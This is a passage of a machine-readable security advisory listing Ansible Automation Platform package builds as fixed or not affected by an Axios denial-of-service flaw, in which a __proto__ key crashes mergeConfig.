"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-2.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels+daphne-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438237"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.src"
],
"known_not_affected": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-2.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.src",
